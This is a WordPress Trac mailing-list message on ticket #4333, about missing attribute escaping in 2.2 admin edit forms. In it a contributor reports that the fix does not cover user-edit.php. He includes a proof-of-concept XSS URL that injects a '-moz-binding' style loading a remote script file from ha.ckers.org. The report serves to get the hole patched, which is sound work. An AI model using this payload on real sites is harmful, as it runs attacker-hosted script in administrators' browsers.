[wp-trac] Re: [WordPress Trac] #4333: Some attribute_escape()s and relatives for edit forms

WordPress Trac wp-trac at lists.automattic.com
Sat May 26 05:29:04 GMT 2007


#4333: Some attribute_escape()s and relatives for edit forms
----------------------------+-----------------------------------------------
 Reporter:  mdawaffe        |        Owner:  rob1n   
     Type:  defect          |       Status:  reopened
 Priority:  high            |    Milestone:  2.2.1   
Component:  Administration  |      Version:  2.2     
 Severity:  normal          |   Resolution:          
 Keywords:                  |  
----------------------------+-----------------------------------------------
Comment (by g30rg3x):

 Well i make some trunk based patches for 2.2.[[BR]]
 Obviously i don't add anything that has to be related with the trunk
 version.[[BR]]
 [[BR]]
 Also i think that the trunk solution is incomplete because doesn't filter
 the user-edit.php based version of the bug:[[BR]]
 user-edit.php?user_id=1&wp_http_referer=%22style=-moz-
 binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)'
 [[BR]]

-- 
Ticket URL: <http://trac.wordpress.org/ticket/4333#comment:8>
WordPress Trac <http://trac.wordpress.org/>
WordPress blogging software


More information about the wp-trac mailing list